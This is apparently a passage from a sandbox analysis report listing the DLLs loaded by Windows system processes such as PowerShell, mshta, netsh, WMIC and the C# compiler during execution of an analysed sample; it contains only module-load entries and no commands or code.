Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
